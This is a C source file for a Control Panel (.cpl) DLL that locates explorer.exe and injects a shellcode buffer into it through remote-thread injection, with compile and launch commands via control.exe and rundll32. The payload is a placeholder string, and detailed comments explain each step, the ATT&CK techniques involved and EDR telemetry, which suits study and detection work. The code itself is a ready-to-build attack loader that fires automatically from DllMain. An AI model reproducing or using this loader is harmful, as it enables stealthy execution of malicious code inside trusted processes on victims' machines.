Load shellcode from a .CPL
// To compile: x86_64-w64-mingw32-g++ -shared -fno-stack-protector -o bacon.cpl bacon.c
// To run: rundll32.exe shell32.dll,Control_RunDLL beacon.cpl
// To run: control.exe beacon.cpl
#include <windows.h>
#include <tlhelp32.h>
#include <winternl.h>
// Function-pointer type for ntdll's NtCreateThreadEx (undocumented native
// thread-creation API). Cplapplet resolves this symbol via GetProcAddress
// but never calls it; the thread is actually created with CreateRemoteThread.
typedef NTSTATUS (NTAPI * NtCreateThreadEx_t)(
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID lpStartAddress,
IN PVOID lpParameter,
IN ULONG Flags,
IN SIZE_T StackZeroBits,
IN SIZE_T SizeOfStackCommit,
IN SIZE_T SizeOfStackReserve,
OUT PVOID lpBytesBuffer);
// FindTarget: returns the PID of the first running process whose image name
// matches procname (case-insensitive), or 0 when no match is found, the
// Toolhelp snapshot cannot be taken, or the enumeration fails.
//
// Note: the entry filled in by Process32First is never compared; matching
// starts with the first Process32Next result, so the first entry of the
// snapshot is always skipped.
int FindTarget(const char *procname) {
HANDLE hProcSnap;
PROCESSENTRY32 pe32;
int pid = 0;
// Take a snapshot of all processes in the system.
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
// dwSize must be set before the first Process32* call.
pe32.dwSize = sizeof(PROCESSENTRY32);
// Retrieve information about the first process; give up (returning 0)
// if the snapshot cannot be enumerated.
if (!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return 0;
}
// Walk the remaining entries and stop at the first case-insensitive name
// match. lstrcmpiA takes ANSI strings, so this only compiles in a
// non-UNICODE build where szExeFile is a char array.
while (Process32Next(hProcSnap, &pe32)) {
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}
CloseHandle(hProcSnap);
// Return the pid of the target process (0 if none matched).
return pid;
}
//Cplapplet
// Cplapplet: Control Panel applet entry point, exported so that control.exe /
// rundll32 can load this module as a .cpl. All four parameters are ignored.
// On every call it locates explorer.exe and performs the classic
// remote-thread injection sequence into it:
//   OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READ) -> WriteProcessMemory
//   -> CreateRemoteThread.
// Returns 0 if the remote thread was created, 1 otherwise.
//
// Detection note: this exact API sequence against explorer.exe, issued from
// a Control Panel item launched via control.exe or
// rundll32 shell32.dll,Control_RunDLL, is the textbook remote-thread
// injection pattern (MITRE ATT&CK T1055, delivered via T1218.002) and is a
// standard EDR / Sysmon (Event ID 8, CreateRemoteThread) telemetry trigger.
extern "C" __declspec(dllexport) LONG Cplapplet(
HWND hwndCpl,
UINT msg,
LPARAM lParam1,
LPARAM lParam2
)
{
// pid is 0 when explorer.exe is not found; OpenProcess then fails and
// hProc is NULL, but no return value below is checked.
int pid = FindTarget("explorer.exe");
HANDLE hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD) pid);
// Placeholder payload: the literal string "<shellcode>" is what gets
// written to the target unless this array is replaced.
unsigned char shellcode[] = "<shellcode>";
// Resolved but never used; CreateRemoteThread below does the work.
NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtCreateThreadEx");
// Allocate an executable (RX) region in the target sized to the whole
// array, including its terminating NUL; result not checked.
LPVOID addressPointer = VirtualAllocEx(hProc,NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READ);
// Copy the payload into the target; bytes-written and success are not checked.
WriteProcessMemory(hProc,addressPointer,(PVOID) shellcode,sizeof(shellcode),(SIZE_T *) NULL);
// Start a thread in the target at the injected buffer.
HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) addressPointer, NULL, 0, NULL);
if (hThread != NULL) {
// Wait at most 500 ms for the remote thread, then release only the
// thread handle; hProc is not closed on this path.
WaitForSingleObject(hThread, 500);
CloseHandle(hThread);
return 0;
}
// Failure path: release the process handle, pause 10 s, report failure.
CloseHandle(hProc);
Sleep(10000);
return 1;
}
// DllMain: invokes Cplapplet as soon as the module is mapped, so the
// injection fires on DLL_PROCESS_ATTACH regardless of whether the host ever
// calls the CPL entry point. Note that this runs process/thread Win32 APIs
// from inside DllMain, i.e. under the loader lock, which the DllMain rules
// advise against. Always returns TRUE.
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
// NULL is passed for every parameter, including the integer msg/lParam
// arguments; Cplapplet ignores all of them.
Cplapplet(NULL, NULL, NULL, NULL);
}
// No break here: falls through into the no-op cases below (harmless).
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}